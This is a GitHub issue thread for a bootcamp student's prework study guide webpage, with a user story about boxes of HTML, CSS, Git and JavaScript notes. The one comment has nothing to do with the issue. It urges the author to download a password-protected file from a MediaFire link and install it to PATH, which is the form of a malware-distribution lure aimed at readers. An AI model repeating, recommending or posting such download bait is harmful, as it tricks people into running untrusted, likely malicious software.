### ISSUE TITLE
HTML

### ISSUE THREAD

**Issue by kavue** [kavue/prework-study-guide#1]
# HTML

## User Story
As a bootcamp student
I want the prework notes to be structured o a webpage 
so that I can easily find and read information 

## Acceptance Criteria
GIVE a Prework Study Guide website 
WHEN I visit the website in my browser
THEN I see four boxes titled HTML, CSS, Git, and JavaScript with associated notes listed

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
